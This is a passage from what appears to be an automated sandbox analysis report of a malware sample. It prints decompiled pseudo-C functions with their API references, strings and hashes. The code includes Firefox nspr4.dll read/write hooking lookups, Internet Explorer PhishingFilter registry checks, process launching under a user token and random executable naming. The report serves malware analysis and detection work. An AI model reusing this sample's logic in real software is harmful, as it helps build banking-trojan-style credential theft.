					_t86 = _a8;
				} else {
					_t86 = _a8;
					_t59 = _t86 + _t88 * 2 - 2;
					while( *_t59 == 0x20) {
						_t88 = _t88 - 1;
						_t59 = _t59;
						if(_t88 > 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t86[_t88] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t86 & 0x0000ffff);
					 *_t86 = 0;
				}
				return _t57;
			}

0x0040e6ee
0x0040e6f0
0x0040e6f3
0x0040e6f8
0x0040e702
0x0040e710
0x0040e717
0x0040e704
0x0040e704
0x0040e707
0x0040e707
0x0040e71a
0x0040e71c
0x0040e71f
0x0040e724
0x0040e730
0x0040e733
0x0040e737
0x0040e743
0x0040e751
0x0040e758
0x0040e745
0x0040e745
0x0040e748
0x0040e748
0x0040e75b
0x0040e75b
0x0040e762
0x0040e778
0x0040e77b
0x0040e7ac
0x0040e799
0x0040e79b
0x0040e79c
0x0040e79c
0x0040e7b4
0x0040e7b8
0x0040e7b9
0x0040e7bc
0x0040e7c5
0x0040e7c5
0x0040e7cc
0x0040e7e8
0x0040e7d2
0x0040e7d2
0x0040e7d5
0x0040e7d9
0x0040e7df
0x0040e7e1
0x0040e7e4
0x00000000
0x00000000
0x0040e7e6
0x00000000
0x0040e7e4
0x0040e7d9
0x0040e7eb
0x0040e7eb
0x0040e7f1
0x0040e7f5
0x0040e7fb
0x0040e801
0x0040e801
0x0040e808

APIs

Part of subcall function 0040B7DF: GetTickCount.KERNEL32 ref: 0040B7DF

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0040E7FB

Strings

bcdfghklmnpqrstvwxz, xrefs: 0040E6F8
aeiouy, xrefs: 0040E707, 0040E710, 0040E748, 0040E751
.exe, xrefs: 0040E6E4

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CharCountTickUpper
String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 2674899715-3410450461
Opcode ID: 5ce55507fe68b4b54e6ea502bc40a64b3056262b90de894a08c2d1dfb0d961ba
Instruction ID: bd46e66f34b512ffce1da6f1e8eb4773afd7cecde61ff36cc39a8f663300086b
Opcode Fuzzy Hash: 5ce55507fe68b4b54e6ea502bc40a64b3056262b90de894a08c2d1dfb0d961ba
Instruction Fuzzy Hash: AA418F75D006199BDB11AF96C0852AEBBB4EF44304F64887BD811BB3C0D3BC9A518BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9AF, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040E9AF(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				char _v268;
				char _v280;
				char _v284;
				signed int _v290;
				signed int _v292;
				signed int _v296;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				char* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t46;
				signed int _t50;
				void* _t51;
				signed int _t52;
				void* _t54;

				_t54 = (_t52 & 0xfffffff8) - 0x118;
				_t46 = __ecx;
				_t24 = E00409833( &_v284, _a4, 0x10);
				_v296 = _v296 ^ _t24;
				_v292 = _v292 ^ _t24;
				_v290 = _v290 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t54 + _t41 + 0x10) =  *(_t54 + _t41 + 0x10) ^  *(_t51 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E00409833( &_v268, _a12, 0x102);
					E0040B928( &_v280, _t41,  &_v296, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t50);
							E00409AD3(_t50, _t42, _t46);
							_t46 = _t46 + _t50 * 2;
						}
					}
				}
				_t29 =  &_v284;
				__imp__StringFromGUID2(_t29, _t46, 0x28);
				return _t29;
			}

0x0040e9b5
0x0040e9c2
0x0040e9c9
0x0040e9ce
0x0040e9d2
0x0040e9da
0x0040e9df
0x0040e9e1
0x0040e9e3
0x0040e9e7
0x0040e9eb
0x0040e9ef
0x0040e9f1
0x0040e9f1
0x0040e9f3
0x0040e9f4
0x0040e9fd
0x0040ea0c
0x0040ea1c
0x0040ea1c
0x0040ea25
0x0040ea28
0x0040ea2a
0x0040ea2b
0x0040ea39
0x0040ea3e
0x00000000
0x0040ea2d
0x0040ea2e
0x0040ea30
0x0040ea35
0x0040ea40
0x0040ea40
0x0040ea45
0x0040ea4a
0x0040ea4a
0x0040ea2e
0x0040ea2b
0x0040ea50
0x0040ea55
0x0040ea60

APIs

StringFromGUID2.OLE32(?,{F0CFCAE1-4272-0517-A2A0-B1E71D94040E},00000028,?,?,00000010,?,00000000), ref: 0040EA55

Strings

Global\, xrefs: 0040EA30
{F0CFCAE1-4272-0517-A2A0-B1E71D94040E}, xrefs: 0040EA4F
Local\, xrefs: 0040EA39

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: FromString
String ID: Global\$Local\${F0CFCAE1-4272-0517-A2A0-B1E71D94040E}
API String ID: 1694596556-4182782267
Opcode ID: 6256d47daddc5c480a1ef1b391e778981e6d3c7f452aeb817d7fd05c1ea2e60f
Instruction ID: 82d45922a16d811bea1abb10ec77fc0c1f953c1e40f1290b2110952d4e561a1b
Opcode Fuzzy Hash: 6256d47daddc5c480a1ef1b391e778981e6d3c7f452aeb817d7fd05c1ea2e60f
Instruction Fuzzy Hash: A4110332214349A7C714EA79C845AAF3799FB89714F048D3FF191E21C2DBB8C514CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B277, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040B277(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E0040B7DF());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E0040A4B7(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E0040B635(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0040b29a
0x0040b2f0
0x00000000
0x0040b2f0
0x0040b29c
0x0040b29e
0x0040b2a3
0x0040b2a4
0x0040b2b3
0x0040b2b9
0x0040b2be
0x0040b2c4
0x00000000
0x00000000
0x0040b2d9
0x0040b2ea
0x0040b2ee
0x00000000
0x00000000
0x00000000
0x0040b2f8
0x00000000
0x0040b2f8
0x0040b2d9
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0040B28E

Part of subcall function 0040B7DF: GetTickCount.KERNEL32 ref: 0040B7DF

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0040B2E0

Strings

%s%08x, xrefs: 0040B2A9
tmp, xrefs: 0040B2A4

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Path$CombineCountCreateDirectoryTempTick
String ID: %s%08x$tmp
API String ID: 1218007593-1196434543
Opcode ID: 74bf11d556c9ee13242fbc0baf65b219239f41313795410a8415de2f4bf4a6c5
Instruction ID: 72d0e886c8ba06fe8f0a55e654c4bfc4a8d7cc122ebb8ef9b9b53ccb4d862680
Opcode Fuzzy Hash: 74bf11d556c9ee13242fbc0baf65b219239f41313795410a8415de2f4bf4a6c5
Instruction Fuzzy Hash: 1FF0F47110022866DA206A159C0EBEF7728DB55714F1002BBFE51F61E1D3B98E8A96DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B3BA(WCHAR* _a4) {
				signed short _t4;
				short _t9;
				signed int _t10;
				WCHAR* _t11;
				WCHAR* _t13;
				int _t18;

				_t13 = _a4;
				_t9 = 0;
				_t11 = PathSkipRootW(_t13);
				if(_t11 == 0) {
					_t11 = _t13;
				}
				while(1) {
					_t4 =  *_t11 & 0x0000ffff;
					if(_t4 == 0x5c || _t4 == 0) {
						goto L4;
					}
					L10:
					_t11 =  &(_t11[1]);
					continue;
					L4:
					_t10 = _t4 & 0x0000ffff;
					 *_t11 = 0;
					if(GetFileAttributesW(_t13) == 0xffffffff) {
						_t18 = CreateDirectoryW(_t13, 0);
					}
					if(_t18 == 0) {
						L12:
						return _t9;
					} else {
						if(_t10 == 0) {
							_t9 = 1;
							goto L12;
						}
						 *_t11 = _t10;
						goto L10;
					}
				}
			}

0x0040b3bc
0x0040b3c3
0x0040b3cb
0x0040b3cf
0x0040b3d1
0x0040b3d1
0x0040b3d3
0x0040b3d3
0x0040b3da
0x00000000
0x00000000
0x0040b40e
0x0040b40f
0x00000000
0x0040b3e1
0x0040b3e1
0x0040b3e7
0x0040b3f3
0x0040b3fe
0x0040b3fe
0x0040b404
0x0040b417
0x0040b41a
0x0040b406
0x0040b409
0x0040b412
0x00000000
0x0040b412
0x0040b40b
0x00000000
0x0040b40b
0x0040b404

APIs

PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,00408D96,?,?,?,?,?,00000000,?,00000017,?,00000000), ref: 0040B3C5
GetFileAttributesW.KERNEL32(?,?,00000000,00408D96,?,?,?,?,?,00000000,?,00000017,?,00000000,00000000,00000002), ref: 0040B3EA
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00408D96,?,?,?,?,?,00000000,?,00000017,?,00000000,00000000), ref: 0040B3F8

Strings

.exe, xrefs: 0040B3C1

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryFilePathRootSkip
String ID: .exe
API String ID: 4231520044-4119554291
Opcode ID: daafcb03a78f2d462975e9f7e0ffc57a41fd2a0d6117033301992045b653839f
Instruction ID: dddf70c896419581ea9ddd8e39d5de948c025f020d909f9b8078180060adba13
Opcode Fuzzy Hash: daafcb03a78f2d462975e9f7e0ffc57a41fd2a0d6117033301992045b653839f
Instruction Fuzzy Hash: 8AF0F6355542255AC3300A255C05BB7B798DE417A0BA14537EED1F73E2D7789C0292EC

Uniqueness

Uniqueness Score: -1.00%

Function 004084A9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004084A9(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				void* _t13;
				void** _t24;
				void* _t27;

				_t13 = _a4(_a8,  &_a8);
				if(_t13 != 0) {
					_t24 = E0040DC40(__ecx, _a8);
					if(_t24 != 0) {
						if(EqualSid( *_t24, _a12) != 0) {
							_t27 = _a8;
							if(E0040A532( &_a4,  &M0040284C, _a16) > 0) {
								E0040F61D(_t27, _a4);
								E004097F7(_a4);
							}
						}
						E004097F7(_t24);
					}
					return CloseHandle(_a8);
				}
				return _t13;
			}

0x004084b3
0x004084b8
0x004084c3
0x004084c7
0x004084d6
0x004084dc
0x004084f2
0x004084f8
0x00408500
0x00408500
0x00408505
0x00408507
0x00408507
0x00000000
0x00408515
0x00408517

APIs

Part of subcall function 0040DC40: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,0040F333,?,?,?,0040784E,000000FF,004192E0), ref: 0040DC59
Part of subcall function 0040DC40: GetLastError.KERNEL32(?,00000000,?,?,0040F333,?,?,?,0040784E,000000FF,004192E0,00000000,?,00000000), ref: 0040DC5F
Part of subcall function 0040DC40: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,0040F333,?,?,?,0040784E,000000FF,004192E0), ref: 0040DC89

EqualSid.ADVAPI32(00000000,004085F2,?,004085F2), ref: 004084CE

Part of subcall function 0040F61D: LoadLibraryA.KERNEL32(userenv.dll,?), ref: 0040F62E
Part of subcall function 0040F61D: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040F64D
Part of subcall function 0040F61D: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0040F659
Part of subcall function 0040F61D: CreateProcessAsUserW.ADVAPI32(?,00000000,004084FD,00000000,00000000,00000000,004084FD,004084FD,00000000,?,?,?,00000000,00000044), ref: 0040F6CA
Part of subcall function 0040F61D: CloseHandle.KERNEL32(?), ref: 0040F6DD
Part of subcall function 0040F61D: CloseHandle.KERNEL32(?), ref: 0040F6E2
Part of subcall function 0040F61D: FreeLibrary.KERNEL32(?), ref: 0040F6F9

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

CloseHandle.KERNEL32(?,?,004085F2), ref: 0040850F

Strings

"%s", xrefs: 004084E2
C:\Users\Jamey\AppData\Roaming, xrefs: 004084D8

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
String ID: "%s"$C:\Users\Jamey\AppData\Roaming
API String ID: 4035272744-1023187160
Opcode ID: 8a98f99d10ef029f03494724b153bc7f4ff41dc3bcb87da57e9fec4c509c0e40
Instruction ID: 89bcfa0803f21314e5956511db12d20a0d81ac0a6a5eac65522ca9d159d333f9
Opcode Fuzzy Hash: 8a98f99d10ef029f03494724b153bc7f4ff41dc3bcb87da57e9fec4c509c0e40
Instruction Fuzzy Hash: FDF01236100109BBCF116F51ED45DDF3F69AF94354B04803AFD18B51A2DB39CA20EB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF91, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040EF91(void* __ecx, short* _a4, short* _a8) {
				void* _v8;
				signed int _t10;
				int* _t15;

				_t15 = 0;
				_v8 = 0x80000001;
				if(_a4 == 0 || RegOpenKeyExW(0x80000001, _a4, 0, 1,  &_v8) == 0) {
					_t10 = RegQueryValueExW(_v8, _a8, 0, 0, 0, 0);
					asm("sbb bl, bl");
					_t15 =  ~_t10 + 1;
					if(_a4 != 0) {
						RegCloseKey(_v8);
					}
				}
				return _t15;
			}

0x0040ef9e
0x0040efa0
0x0040efa6
0x0040efc7
0x0040efd1
0x0040efd3
0x0040efd8
0x0040efdd
0x0040efdd
0x0040efd8
0x0040efe8

APIs

RegOpenKeyExW.ADVAPI32(80000001,77E49EB0,00000000,00000001,00000000,Software\Microsoft\Internet Explorer\Privacy,00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EFB3
RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\Privacy,00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EFC7
RegCloseKey.ADVAPI32(00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000,?,77E49EB0,00000000), ref: 0040EFDD

Strings

Software\Microsoft\Internet Explorer\Privacy, xrefs: 0040EF96

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Software\Microsoft\Internet Explorer\Privacy
API String ID: 3677997916-2534944989
Opcode ID: d188b7e48bf08c8685dc8ea4fde570a0b0ab0f789e056fc68ff25ef5254fecc1
Instruction ID: d1280478838fcd4d0becdad72d887cefeb24434b522edcd6d61dd8f6db6918ac
Opcode Fuzzy Hash: d188b7e48bf08c8685dc8ea4fde570a0b0ab0f789e056fc68ff25ef5254fecc1
Instruction Fuzzy Hash: ADF09031542128FBCB209FA2DD4DDCF7F6CEF06790B108526F449A2160D2759A94DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE27, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EE27(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				signed int _t19;
				signed int _t20;

				_t20 = _t19 | 0xffffffff;
				if(_a8 == 0 || RegOpenKeyExW(_a4, _a8, 0, 1,  &_a4) == 0) {
					if(RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24) == 0) {
						_t20 = _a24;
					}
					if(_a8 != 0) {
						RegCloseKey(_a4);
					}
				}
				return _t20;
			}

0x0040ee2b
0x0040ee32
0x0040ee66
0x0040ee68
0x0040ee68
0x0040ee6f
0x0040ee74
0x0040ee74
0x0040ee6f
0x0040ee7e

APIs

RegOpenKeyExW.ADVAPI32(77E49EB0,00000000,00000000,00000001,77E49EB0,Software\Microsoft\Internet Explorer\PhishingFilter,?,0040EDF3,77E49EB0,?,00000000,00000000,00000000,00000004,?,?), ref: 0040EE42
RegQueryValueExW.ADVAPI32(77E49EB0,00000000,00000000,?,80000001,00412E77,Software\Microsoft\Internet Explorer\PhishingFilter,?,0040EDF3,77E49EB0,?,00000000,00000000,00000000,00000004), ref: 0040EE5E
RegCloseKey.ADVAPI32(77E49EB0,?,0040EDF3,77E49EB0,?,00000000,00000000,00000000,00000004,?,?,00412E77,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EE74

Strings

Software\Microsoft\Internet Explorer\PhishingFilter, xrefs: 0040EE2A

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Software\Microsoft\Internet Explorer\PhishingFilter
API String ID: 3677997916-1156891443
Opcode ID: e22c9f8a18a6840d6111768aa4ed264c88314107c800eca66fb5c4fef9130150
Instruction ID: 81f5fa9c1e8121a9097eec73d893d2af5cf02b832e253095055a4dc12f849a39
Opcode Fuzzy Hash: e22c9f8a18a6840d6111768aa4ed264c88314107c800eca66fb5c4fef9130150
Instruction Fuzzy Hash: D5F0E73210020DBBDF219F95DC04BDA3B69AB147A1F008032FE59A51E0D379D9A5DBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004075D7, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004075D7(void* __eax, signed char _a4) {
				short _v524;
				signed int _t11;
				WCHAR* _t16;

				if((_a4 & 0x00000001) != 0) {
					L4:
					GetModuleFileNameW(0,  &_v524, 0x104);
					_t11 = E00409AEE( &_v524);
					 *0x41932c = _t11;
					return _t11 & 0xffffff00 | _t11 != 0x00000000;
				}
				_t16 = L"C:\\Users\\Jamey\\AppData\\Roaming";
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t16);
				if(__eax == 0) {
					PathRemoveBackslashW(_t16);
					goto L4;
				}
				return 0;
			}

0x004075e5
0x0040760a
0x00407618
0x00407625
0x0040762c
0x00000000
0x00407631
0x004075e7
0x004075f5
0x004075fd
0x00407604
0x00000000
0x00407604
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\Jamey\AppData\Roaming,00000000), ref: 004075F5
PathRemoveBackslashW.SHLWAPI(C:\Users\Jamey\AppData\Roaming), ref: 00407604
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 00407618

Strings

C:\Users\Jamey\AppData\Roaming, xrefs: 004075E7, 004075EC, 00407603

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Path$BackslashFileFolderModuleNameRemove
String ID: C:\Users\Jamey\AppData\Roaming
API String ID: 41170746-382707871
Opcode ID: 004e3ea2b7706ce64338be5f3b712c28e76af9f936456c3193e7e210aaf6ddcd
Instruction ID: 5c2d7b900f6a9a4de181bdf5537ccc6e010dd08d775d701af251132af00cac4f
Opcode Fuzzy Hash: 004e3ea2b7706ce64338be5f3b712c28e76af9f936456c3193e7e210aaf6ddcd
Instruction Fuzzy Hash: DCF0273064835877EB206B708E0AFDB3B9C4B15751F0080B5FA46F50E1DAB89940CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00407728, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00407728(void* __edi, void* __eflags) {
				void* _t4;
				void* _t7;
				void* _t8;

				InitializeCriticalSection(0x41aa20);
				 *0x41aa14 =  *0x41aa14 & 0x00000000;
				 *0x41aa10 =  *0x41aa10 & 0;
				 *0x41aa1c = 0;
				 *0x41aa18 = 0;
				E00412E18(_t7);
				 *0x4191a4 =  *0x4191a4 & 0x00000000;
				 *0x4191c0 =  *0x4191c0 & 0x00000000;
				InitializeCriticalSection(0x4191a8);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t4 = 0;
				} else {
					_push(__edi);
					_t4 = E00404DB1(_t7, _t8, _t3);
				}
				if(_t4 != 0) {
					 *0x4191a0 =  *0x4191a0 | 0x00000001;
				}
				E00404CCE();
				return 1;
			}

0x00407734
0x00407736
0x0040773f
0x00407745
0x0040774b
0x00407751
0x00407756
0x0040775d
0x00407769
0x00407779
0x00407786
0x0040777b
0x0040777b
0x0040777e
0x00407783
0x0040778a
0x0040778c
0x0040778c
0x00407793
0x0040779a

APIs

InitializeCriticalSection.KERNEL32(0041AA20,00000000,00407927,00000000,?,00000000), ref: 00407734

Part of subcall function 00412E18: InitializeCriticalSection.KERNEL32(0041AA38), ref: 00412E36

InitializeCriticalSection.KERNEL32(004191A8,?,00000000), ref: 00407769
GetModuleHandleW.KERNEL32(nspr4.dll,?,00000000), ref: 00407770

Part of subcall function 00404DB1: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00404DBF
Part of subcall function 00404DB1: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00404DCC
Part of subcall function 00404DB1: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00404DD9
Part of subcall function 00404DB1: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00404DE6
Part of subcall function 00404DB1: ResetEvent.KERNEL32(?,00000000,00407783,?,00000000), ref: 00404DF3
Part of subcall function 00404DB1: SetEvent.KERNEL32(00419140,00000000,?,00000000,00407783,?,00000000), ref: 00404E33

Strings

nspr4.dll, xrefs: 0040776B

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalInitializeSection$Event$HandleModuleReset
String ID: nspr4.dll
API String ID: 1132501977-741017701
Opcode ID: 391247c27e63a50717901a38e7f55fb24438555771ffd6d281860828161e356a
Instruction ID: 3e6abfb8016c021bc7d3bcaba77ac5b46de26a3cc09bd4c88bd6b66b3cedb502
Opcode Fuzzy Hash: 391247c27e63a50717901a38e7f55fb24438555771ffd6d281860828161e356a
Instruction Fuzzy Hash: 57F0B435952211BAE7009BA5BE0D7D537D0AF453E5F50813BD400B31A2D77C5851CB9F

Uniqueness

Uniqueness Score: -1.00%

Function 0040F502, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F502(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetModuleHandleW(L"kernel32.dll");
				if(_t7 == 0) {
					L4:
					return _t7 & 0xffffff00 | _v8 != 0x00000000;
				} else {
					_t7 = GetProcAddress(_t7, "IsWow64Process");
					if(_t7 == 0) {
						goto L4;
					} else {
						_t7 = _t7->i(0xffffffff,  &_v8);
						if(_t7 != 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x0040f506
0x0040f50f
0x0040f517
0x0040f539
0x0040f541
0x0040f519
0x0040f51f
0x0040f527
0x00000000
0x0040f529
0x0040f52f
0x0040f533
0x00000000
0x0040f535
0x0040f538
0x0040f538
0x0040f533
0x0040f527

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040751C,00000000,00407832), ref: 0040F50F
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040F51F

Strings

kernel32.dll, xrefs: 0040F50A
IsWow64Process, xrefs: 0040F519

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
Opcode ID: 77363ff6abec88cf8231562f5a850e471fc702b449621d8bd81e7f84cd361e17
Instruction ID: 99360361ddb860fd658623506d1cbc3caa78e3ffc6cc61a8505642ad20e7410c
Opcode Fuzzy Hash: 77363ff6abec88cf8231562f5a850e471fc702b449621d8bd81e7f84cd361e17
Instruction Fuzzy Hash: A3E0DF75200206BADF109FB5AD0AB5B32AC9B10798F204279A010F20C1EBFCCA08A12C

Uniqueness

Uniqueness Score: -1.00%

Function 004131F5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004131F5(intOrPtr _a4, intOrPtr _a12) {
				void* __esi;
				void* _t6;
				signed int _t7;
